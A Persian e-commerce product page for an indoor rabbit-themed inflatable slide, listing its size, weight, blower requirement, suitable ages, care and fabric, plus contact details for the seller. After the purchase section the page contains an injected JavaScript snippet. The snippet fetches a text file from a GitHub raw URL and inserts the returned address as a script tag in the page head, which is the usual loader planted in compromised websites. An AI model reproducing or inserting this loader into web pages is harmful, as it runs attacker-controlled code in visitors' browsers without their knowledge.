سرسره بادی خرگوشی

  • سرسره بادی طرح خرگوشی، یک سرسره بادی مناسب برای محیط های سر پوشیده به ابعاد و اندازه است. این قصر بادی خرگوش دارای ویژگی های مثبت زیادی است که در بخش پایین به آن اشاره شده. این سرسره از رنگ های جذاب طراحی شده که برای کودکان جذاب باشد. در ورودی این سرسره یک آرک طراحی شده که دیواره کناری را به همدیگر به هم متصل می کنند. بری روی دیوار سکوی سر آین سرسره یک خرگوش صورتی جذاب طراحی شده.

    ابعاد و اندازه سرسره بادی خرگوشی

    وزن این سرسره ۱۳۰ کیلوگرم، طول این سرسره ۶ متر و عرض آن ۵ متر می باشد. همچنین ارتفاع این سرسره ۵ متر است. بنابرین شما می توانید از این سرسره در محیط های سربسته کوچک مانند مهدکودک ها و شهر بازی های سر پوشیده به شرط ارتفاع بالاتر استفاده نمایید.

    لوازم جانبی

    این قصر بادی خرگوش نیازمند یک پمپ هوا (دمنده باد) نیم اسب می باشد. همچنین نیازمند اقلام پیشفرض مانند روکش سر و واکس است.

    نحوه نگهداری و درجه سنی

    این سرسره بادی خرگوش مناسب سنین ۴ تا ۱۲ سال می باشد که در مهد کودک ها کاربرد بسیار بالایی دارد. همچنین این سرسره بادی به شرایط بد آب و هوایی حساس است بنابرین دوری از رطوبت و گرمای آفتاب می تواند به طول عمر سرسره شما اضافه کند.

    جنس پارچه و دوخت این قصر بادی خرگوش

    پارچه این قصر بادی خرگوش از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است.

    نحوه خرید سرسره بادی خرگوشی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید سرسره بادی طرح خرگوشی می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید